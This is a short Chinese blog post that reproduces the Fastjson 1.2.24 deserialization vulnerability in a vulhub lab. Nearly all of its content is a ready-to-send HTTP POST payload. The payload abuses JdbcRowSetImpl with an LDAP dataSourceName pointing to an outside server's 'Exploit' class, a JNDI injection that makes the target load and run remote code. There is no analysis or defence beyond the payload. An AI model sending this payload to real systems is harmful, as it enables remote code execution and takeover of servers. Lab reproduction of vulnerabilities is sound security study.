Fastjson-1.2.24漏洞复现
Fastjson-1.2.24漏洞复现
水一篇文章,昨天做了1.2.47的忘记了一个低版本的今天补上
配置所有我都没有变,同样使用的是vulhub来启动Fastjson环境
知识最后的Payload有所不同
-
Payload,访问Fastjson环境,然后替换包内容
POST / HTTP/1.1 Host: 104.128.92.144:8090 Content-Type: application/json Content-Length: 172 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://104.128.92.144:7777/Exploit", "autoCommit":true } }
版权声明:
本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
Sugarbeet's Blog!
喜欢就支持一下吧
-2a1d49a984e14219905cc7e0109a621b.png&summary=Fastjson-1.2.24漏洞复现水一篇文章,昨天做了1.2.47的忘记了一个低版本的今天补上配置所有我都没有变,同样使用的是vulhub来启动Fastjson环境知识最后的Payload有所不同Payload,访问Fastjson环境,然后替换包内容POST / HTTP/1.1Host: 1){kind=link}
-2a1d49a984e14219905cc7e0109a621b.png&desc=Fastjson-1.2.24漏洞复现水一篇文章,昨天做了1.2.47的忘记了一个低版本的今天补上配置所有我都没有变,同样使用的是vulhub来启动Fastjson环境知识最后的Payload有所不同Payload,访问Fastjson环境,然后替换包内容POST / HTTP/1.1Host: 1){kind=link}